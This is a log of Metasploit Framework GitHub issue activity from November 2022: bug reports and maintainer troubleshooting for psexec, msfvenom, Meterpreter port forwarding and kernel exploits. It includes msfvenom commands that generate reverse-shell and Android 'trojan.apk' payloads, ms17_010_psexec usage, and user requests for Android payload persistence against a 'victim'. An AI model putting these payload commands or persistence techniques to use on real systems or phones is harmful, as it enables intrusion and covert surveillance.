[2022-11-16 01:05] Reversing26 opened #17266 "SMB_psexec authenticated code execution is broken, what I can do for that?"
Despite correct values for SMBUser/SMBPass (i've tried both plain text pass and the hashdump method) all it says is:

192.168.59.142:445 - Connecting to the server...
[*] 192.168.59.142:445 - Authenticating to 192.168.59.142:445| as user 'Administrator'...
[-] 192.168.59.142:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_G

[2022-11-16 07:04] financialeducation opened #17267 "No results from search can't import module"
Msfconsole doesn't recognise the imported auxiliary/scanner/
Here is what I did

https://i.imgur.com/pnXMuz0.png

git clone https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell.git
cd https://github.com/advisories/GHSA-6ph7-8wxv-6gf2-metasploit-ProxyNotShell
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp microsoft_exchange_server_proxynotshell_ssrf.py ~/.msf4/modules/auxili

[2022-11-16 14:13] smcintyre-r7 commented on #17266
Well in the first case it sounds like the user has authenticated but can't login interactively to perform the psexec operation.

In the second case it looks like either the username or password is incorrect. I see in the second case the domain is using `WORKGROUP`, so it's probably either that or the password.

In either case, I don't think this is something we can fix on the psexec side.

[2022-11-16 14:21] Reversing26 commented on #17266
I've tried with SMBDomain as "." still not working

[2022-11-16 15:59] gwillcox-r7 commented on #17237
@Dinamitrii So apparently Windows 11 isn't a supported installation target at the moment from what I have been told. Is there any way you could try this with Windows 10 perhaps and see if that helps things?

[2022-11-16 18:27] #17230 closed

[2022-11-16 20:04] M4jx opened #17270 "Application server error: Login Failed"
## Steps to reproduce
1. Run: `openssl req -newkey rsa:2048 -nodes -keyout msf-ws-key.pem -x509 -days 365 -out msf-ws-cert.pem` in `~/.msf4/`
2. Start msfrpcd with JSON-RPC using this command: `msfrpcd -a <internal_ip> -P msf -U msf -f -j`
3. Send below json request to the json-rpc api endpoint at: `https://<internal_ip>:55553/api/v1/json-rpc`
[code]

## Expected behavior

The API endpoint returns

[2022-11-17 00:14] hastalamuerte opened #17274 "Flipper zero msf badusb payload generator/executor"
Hello, I am a big fan of your software. Especially metasploit. Respect to Egypt )

Write you with one help request. There is a tool called Flipper Zero. Its a education tool for hackers , radio enthusiasts and others techs people community. Soon they will present flipper one with kali or other linux onboard.

I am not present any company. I just simple security engineer. But i very want to test on

[2022-11-17 00:41] h00die commented on #17274
Seems like an msfvenom function. It would need to be all ASCII, so a b64 decode or something similar.

I have a flipper zero to test with

[2022-11-17 02:48] hastalamuerte commented on #17274
And !!!! I found i think the best one off
https://github.com/nocomp/Flipper_Zero_Badusb_hack5_payloads
@_@
Look awesome. Will try too.

Thanks for answer, its sound quite cool! I think some brand msf module , app will be very cool.
Dolphin and cow )))

[2022-11-17 16:00] cdelafuente-r7 commented on #11405
The fix has been merged and `ruby_smb` version 3.2.1 gem has been released.

[2022-11-17 16:00] #11405 closed

[2022-11-17 16:14] jeffmcjunkin commented on #15159
Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.

[2022-11-17 18:25] JustAnda7 commented on #17212
Sorry for the delay. I am having some issues with the testing. I will submit a PR once the testing is done correctly.

[2022-11-17 18:26] JustAnda7 commented on #17212
@gwillcox-r7 do you know of any way of testing other than an LDAP query ?

[2022-11-17 19:45] gwillcox-r7 commented on #17138
No response or additional info given so closing out this issue due to lack of sufficient information to reproduce things.

[2022-11-17 19:45] #17138 closed

[2022-11-17 19:47] gwillcox-r7 commented on #17139
@shellchocolat Were you able to get this to work using the command `msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.bin LHOST=xxx.xxx.xxx.xxx LPORT=xxxx`?

[2022-11-17 19:57] gwillcox-r7 commented on #17212
You could feed some data into the respective function using `irb` and make sure the resulting data structure is populated correctly. This would take advantage of BinData's `read` function.

Here we would just do `access_mask = Rex::Proto::MsDtyp::MsDtypAccessMask.read(raw_binary_input_data)` and then make sure that the raw binary in `raw_binary_input_data` gets populated into a valid BinData struc

[2022-11-17 20:59] hastalamuerte commented on #17274
And !!!! I found i think the best one off
https://github.com/nocomp/Flipper_Zero_Badusb_hack5_payloads
@_@
Look awesome. Will try too.

Thanks for answer, its sound quite cool! I think some brand msf module , app will be very cool.
Dolphin and cow )))

Update
https://github.com/flipperdevices/flipperzero-firmware/blob/dev/documentation/fbt.md
https://github.com/flipperdevices/flipperzero-firmware/

[2022-11-17 21:27] h00die commented on #17274
https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-quick-reference

[2022-11-18 03:17] pwnb0y commented on #17159
I would like to work on this issue

[2022-11-18 13:54] adfoster-r7 opened #17276 "Python msfvenom and multi handler crash with reverse_http stager"
## Steps to reproduce

msfvenom:

[code]

multi handler:
[code]

Stack trace:
[code]

## Crash reason

This pull request removed the cached size of the reverse_http stager from static to dynamic https://github.com/rapid7/metasploit-framework/pull/17211/files#diff-9436dea92a55789d3a165af486ff4db6a687529b72780f81d93c40f6410d054d

When the available_space value is set here:
https://github.com/rapid7/

[2022-11-18 16:17] #16218 closed

[2022-11-19 15:18] #16502 closed

[2022-11-19 15:19] #17198 closed

[2022-11-19 16:45] Invoke-Mimikatz opened #17282 "Reverse Port Forward Can't Listen on Localhost"
## Steps to reproduce

0. Get a Meterpreter shell (I used `windows/x64/meterpreter/reverse_tcp` but it should not matter)
1. Start Python HTTP server on MSF host: `python3 -m http.server 8080`
2. Add a reverse port forward `portfwd add -R -l 8080 -L 127.0.0.1 -p 2222 -r 127.0.0.1`
3. Observe the inaccurate message saying the reverse listener is open on **127.0.0.1**:2222
4. Use `netstat` to confir

[2022-11-19 18:27] Invoke-Mimikatz commented on #17282
Few additional notes since troubleshooting this issue:

The first issue seems to be missing Ruby code to allow sending of a `localHost` value for the Windows machine to listen on:

[code]
and possibly also here
[code]

https://github.com/rapid7/metasploit-framework/blob/fa125e19430d7907471edc8d46d2920b7e1d2ffd/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb#L454-L458

In the M

[2022-11-19 20:27] Dinamitrii commented on #17237
@gwillcox-r7 ОК I`ll try it on OracleVM and if you want I`ll try it on a bare metal OK?

[2022-11-19 20:35] gwillcox-r7 commented on #17237
@Dinamitrii Sounds good, appologies for any headache caused by this I also wasn't aware we didn't support Windows 11. VM of Windows 10 should still work but let me know if not and we can dig deeper into this.

[2022-11-20 03:55] bcoles commented on #17043
This module is a naive threaded spray and pray poor man's nikto/nuclei vulnerability scanner. You could also think of it as dirbuster/gobuster with response context text matching.

A quick test and read of the source reveals the format should be:

[code]

For example:
[code]

CSV parsing:

https://github.com/rapid7/metasploit-framework/blob/234949bff8641e128cea5ab363093d5acba938b7/modules/auxiliar

[2022-11-20 16:38] h00die commented on #17159
go for it!

[2022-11-20 18:24] Dinamitrii commented on #17237
@gwillcox-r7 it appers it's more difficult to install on Win 10 than Win 11 after partial install i get to msfupdate.bat i succeeded to install metasploit-framework on Oracle's VM this OS:

Edition	Windows 10 Pro
Version	22H2
Installed on	‎11/‎20/‎2022
OS build	19045.2311
Experience	Windows Feature Experience Pack 120.2212.4190.0

after that same error:

PS C:\metasploit-framework\bin> .\msfdb.bat

[2022-11-21 08:40] AR99X opened #17287 "Presistence Android Payload (android versions above 10)"
Hi guys,
**(1)** I cant make Android Payload keep working on background or make it (autostart),
I tried many methods to make the payload presistence but it always fail
and this script not working anymore on androids above 10,0. (I'm testing on my phone android 11)

**(2)** How can i make the payload Display over apps, they call it (Draw over apps) because commands **Screenshot, Screenshare** not w

[2022-11-21 15:00] #17037 closed

[2022-11-21 15:00] #17034 closed

[2022-11-21 15:25] Kingzki commented on #13808
I have done everything right but meterpreter shell could not be opened even after I install the apk

[2022-11-21 22:58] h00die commented on #17200
Created an ubuntu 22.04 VM, installed [5.13.12](https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.13.12/amd64/). Single CPU system running on ESXi

## CVE-2022-1043

[code]

failed.  Any ideas why?

## CVE-2022-22942

[code]

success. I'll look at adding this to framework.

[2022-11-22 01:36] bcoles commented on #17287
https://github.com/rapid7/metasploit-framework/issues/16349#issuecomment-1068774955. See https://dontkillmyapp.com/ for more information.

[2022-11-22 13:13] bcoles opened #17289 "sysinfo['Computer'] returns IP address not hostname on Linux sessions"
https://github.com/rapid7/mettle/issues/239

On Meterpreter sessions on Windows `session.sys.config.sysinfo['Computer']` returns the system hostname, whereas on Linux the host IP address is returned instead.

[code]

[2022-11-22 13:46] johnmrh opened #17290 "apksigner not found. If it's not in your PATH, please add it."
## Summary

## Relevant information

[2022-11-22 13:49] johnmrh commented on #17290
it gives me                                                         [-] no platform was selected,choosing Msf::Module::platform:: android from payload and [-] no arch selected, selecting arch:dalvik from the payload and ERROR:apksigner not found.If its not in your path,please add it

[2022-11-22 13:52] Kingzki commented on #14009
I did everything correctly but my listener was
"Started reverse TCP handler on ......etc"
After that nothing happened even though I have installed the payload on the victims phone, can someone please help me

[2022-11-22 13:56] bcoles commented on #17290
Install apksigner.

[code]

[2022-11-22 14:02] smcintyre-r7 commented on #17212
Completed in #17288

[2022-11-22 14:02] #17212 closed

[2022-11-22 14:15] solardiz commented on #17200
@h00die You need at least two vCPUs in the VM for this exploit to work as-is.

[2022-11-22 17:07] NeffIsBack commented on #13928
Hi @OJ,

i am trying to dig into the commit history and debug log of the broken extension. It might be that in one of your refactoring commits 364b7fac494d6f75c85ca63bc7b8278f9cc3f684 or 8070074da39e8cb11ef3677cfa31c27117d76383 the extension ids broke. Atleast thats what it looks like to me.
Can you remember how the sniffer module should interact with the core meterpreter?
It always seems to break

[2022-11-22 22:55] kpomeroy1979 commented on #8839
This may not help anyone but I found the fix. I was using Metasploit  + SOCKS proxying running the smb_login module over AWS and got the error "too many open files...port 0 localhost" and the fix for me was to increase the limits for the user account running Metasploit by editing **/etc/security/limits.conf**

more details here - https://linuxhint.com/increase-open-file-limit-ubuntu/

reboot once

[2022-11-23 00:22] Invoke-Mimikatz opened #17292 "Meterpreter Portforward Breaks When Route is Added"
## Steps to reproduce

How'd you do it?

0. Get a Meterpreter session (I used `windows/x64/meterpreter/reverse_tcp` but IT DOESN'T MATTER)
1. Start a Python HTTP server on port 80: `python3 -m http.server 80`
2. Start a reverse port forward on the Meterpreter session: `portfwd add -R -l 80 -L 127.0.0.1 -p 8888`
3. Observe the successful portforward on the Windows victim host: `curl 127.0.0.1:8888`

[2022-11-23 00:22] Invoke-Mimikatz commented on #17292
@smcintyre-r7 :)

[2022-11-23 00:54] h00die commented on #17200
@minipli-oss any idea when https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22942 may get filled in?

@minipli-oss is a vmwgfx bug, I have version 2.18.1.0 loaded on my exploitable box.  Is there a version series that are vulnerable, or is it more tied to the kernel versions.  If it's a kernel version (like it looks on https://ubuntu.com/security/CVE-2022-22942) do you have a summarized lis

[2022-11-23 01:58] adfoster-r7 commented on #17292
I wonder if this is a bug, or just unexpected behavior? It seems like you're globally setting the routing table to sent all network connections to your Meterpreter instance, so the incoming portfwd request gets sent back out to comm -1, i.e. Meterpreter

I only took a quick glance, but enabling the tlv logging with `setg sessiontlvlogging true` after adding the route and I can see the following re

[2022-11-23 07:34] minipli-oss commented on #17200
I've no idea, sorry. But using individual vendor sites may provide some insight (as you already did).

I gave some background information in the related [oss-security posting](https://www.openwall.com/lists/oss-security/2022/01/27/4) and mentioned kernel versions including the fix in a [follow-up post](https://www.openwall.com/lists/oss-security/2022/02/03/1).

The kernel versions affected are lis

[2022-11-23 14:06] #17274 closed

[2022-11-23 14:08] smcintyre-r7 commented on #17274
This will be part of the 6.2.28 release tomorrow.

[2022-11-23 20:43] gwillcox-r7 commented on #17237
Please use triple backslash to create code blocks for output in future otherwise it will be hard to follow what you are saying due to formatting issues. I have gone ahead and corrected this for you in your previous post.

Thanks for posting your output, definitely seems like there is some deeper issue, particularly as Jeffery pointed out during our discussions, it seems odd that a Linux path is be

[2022-11-24 00:09] Dinamitrii commented on #17237
@gwillcox-r7  thank you so much i'm appreciated, and i'll wait much as possible.thanks again.

[2022-11-24 05:59] smashery commented on #17259
@bcoles - I'm having trouble reproducing this - I've tried on Server 2016, Server 2012, Win 10 (on commit c9ba07e3a7d3848c9cb4cd27279cf8fa1ff0346b), and everything seems to be working fine - both upgrading a session, and running a post module (checkvm). I've included my steps below, if you wanted to see if I'm not replicating correctly. Could you post some more info to help me narrow this one down

[2022-11-24 06:53] bcoles commented on #17259
I can't reproduce this either. The issue likely still exists but I can't be bothered looking into it. Closing.

[2022-11-24 06:53] #17259 closed

[2022-11-24 14:40] woOzZ2 commented on #16687
I'm having the same issue, the value of srvhost will be overridden by lhost anyway, and the way of #16250 will not get any improvement

[2022-11-24 15:00] #17017 closed

[2022-11-24 16:29] kybe236 opened #17297 "error with ruby"
## Steps to reproduce

How'd you do it?

1. Install metasploit on ubuntu 22.10 and 22.04.1(clean install,Nvidia driver-515)
2. start msfconsole
3. use the payload windows/smb/ms17_010_psexec
4. seting the lhost to tun0 and rhost to an hackthebox server
5. run it

## Expected behavior

I should get a shell

## Current behavior

I get error meseges

### Metasploit version

Framework: 6.2.28-dev-
Con

[2022-11-24 19:11] adfoster-r7 commented on #17297
Which hackthebox machine are you targeting? Are you setting smbuser and smbpass correctly?

[2022-11-25 05:46] kybe236 commented on #17297
This Here:
https://academy.hackthebox.com/module/75/section/762

[2022-11-25 05:56] kybe236 commented on #17297
https://academy.hackthebox.com/module/39/section/404

[2022-11-25 15:00] #17059 closed

[2022-11-26 18:58] Invoke-Mimikatz commented on #17292
Thanks! It does seem like this is just unintended behavior. Feel free to close the issue! :)

[2022-11-26 23:15] gwillcox-r7 opened #17302 "Add in CVE-2017-9833 and CVE-2021-33558"
## Summary

These two CVEs have been found in the now discontinued Boa web server however according to https://securityaffairs.co/wordpress/138916/hacking/boa-web-servers-attacks.html the Boa web server has seen attacks against it as late as 2020 even after the server was discontinued in 2005.

It would be ideal to include checks for this as part of the framework in order to allow users to identif

[2022-11-26 23:21] gwillcox-r7 commented on #17302
Woops forgot to mention the server and its downloads are available at the official server website at http://www.boa.org/

[2022-11-27 03:22] adfoster-r7 commented on #17292
I wouldn't have expected it to work this way either 😄

I don't know if there's a better UX for this. Potentially generating a warning? Or if there was an easier way to configure msfconsole's routing table to say 'route everything to comm 1, apart from localhost'

[2022-11-28 02:21] AlanFoster commented on #17302
# heading 1
## heading 2
### heading 3
### heading 4

[2022-11-28 11:25] kybe236 commented on #16977
I have the Same issue,
plese help me

[2022-11-28 14:30] #17290 closed

[2022-11-28 14:33] smcintyre-r7 commented on #17267
There's probably something wrong with the Python module and hosting environment. #17267 adds a native Metasploit module for the same vulnerability though that includes an exploit instead of just checking for the SSRF.

[2022-11-28 14:53] JBalanza commented on #17020
I'm currently studying OSEP too and I can tell that from the challenge 1, reverses from the Windows 2019 test machine does not work with HTTPS as stated in this thread. Other payloads work fine.

[2022-11-28 15:00] #16963 closed

[2022-11-28 15:44] letmexplore commented on #13842
Same problem I am facing please anyone tell me how to solve it I am beginner

[2022-11-28 16:04] Bhanu26032 commented on #13842
Try to install metasploit new as a root user

sudo apt install msvenom

or

sudo apt install metasploit-framework

[2022-11-28 21:23] #17227 closed

[2022-11-28 22:16] adfoster-r7 commented on #17227
Whoops - forgot to reply to this at the time, the account ping was to `@alanfoster` instead of `@adfoster-r7`. It looked like a regression in the cmd_exec changes - so we asked smashery to take a look at this behind the scenes :+1:

[2022-11-29 10:14] bcoles commented on #17259
It's possible that I was using a PowerShell reverse shell to a `windows/x64/shell_reverse_tcp` handler. It is expected that powershell payloads won't work with shell handlers.

I have a habit of using port 1337 for meterpreter but re-using port 1338 for both shell and meterpreter sessions. I thought I'd double checked that I was using a shell payload - but it's possible that a PowerShell.exe proce

[2022-11-29 12:28] fastchain commented on #17199
@smcintyre-r7 thank you!
I would like to have unstaged reverse_tcp_rc4 . Is it possible somehow?

[2022-11-30 00:52] badboycxcc commented on #17262
<img width="1259" alt="截屏2022-11-30 上午8 51 30" src="https://user-images.githubusercontent.com/72059221/204680803-f197558f-93d7-4a5d-b136-a88374d6820b.png">
<img width="1259" alt="截屏2022-11-30 上午8 52 18" src="https://user-images.githubusercontent.com/72059221/204680901-7a6e2194-a9c6-418b-8dbb-e8b884ac9f97.png">

[2022-11-30 00:53] badboycxcc commented on #17262
I executed Reload_all

[2022-11-30 01:10] bcoles commented on #17262
It is hard to see what you're doing in the screenshots as the paths are truncated. However, it looks like you are probably using the correct directory.

The module contains a syntax error as per the logs:

[code]

The regex on line 306 needs to be fixed:

[code]

I don't know what the correct regex is supposed to be, but the `)` is causing issues. At a guess:

[code]

Or:

[code]

Without access t

[2022-11-30 02:38] smashery commented on #8900
This was resolved by #15632, as encrypted comms was implemented with that.

Replicating immediately before this PR (commit a1eef6a2c194284fe5e90be602eaa6417db51651):

[code]

Fixed after the merge (commit ca6f957de0692ee51b656368540d904c971d00c0):

[code]

[2022-11-30 02:38] #8900 closed

[2022-11-30 14:14] gwillcox-r7 commented on #17262
The other option would be to paste the output of trying to load the module even if it doesn't show up in the search results. This will usually show you if it is a typo error within the module or at least help to narrow down what is causing the issue itself. Not sure that `set HttpTrace true` is going to help much if you can't even load the module in the first place.

[2022-11-30 14:29] bcoles commented on #17262
The module contains a syntax error.

I suggested valid syntax which allow the module to be loaded.

The code change relates to regex.

I have no idea if the code change will allow the module to operate as expected.

`set HttpTrace true` can be used to print the response from the server. Once a response from the server has been provided a valid regex can be crafted to ensure the module operates as

[2022-11-30 17:18] #17267 closed

[2022-11-30 20:40] mohamed1515i opened #17319 "msfvenom -p android/meterpreter/reverse_tcp LHOST=Your Ip LPORT=Your Port -o ~/storage/downloads/trojan.apk"
## Summary

## Relevant information

[2022-11-30 20:41] mohamed1515i opened #17320 "[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10234 bytes Error: No such file or directory @ rb_sysopen - /root/storage/downloads/trojan.apk"
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10234 bytes
Error: No such file or directory @ rb_sysopen - /root/storage/downloads/trojan.apk

[2022-11-30 20:44] #17319 closed

[2022-11-30 21:23] smcintyre-r7 commented on #17206
Alright, I was able to reproduce this and I think you're right it's probably a paging issue because there isn't any paging.

I used [davidprowe/BadBlood](https://github.com/davidprowe/BadBlood) to populate my AD instance with 2,500 users (the default number) and then created mailboxes for each of them using `Get-User | Enable-Mailbox` from the Exchange Powershell console.

[2022-11-30 22:52] bcoles commented on #17320
Error: No such file or directory @ rb_sysopen - /root/storage/downloads/trojan.apk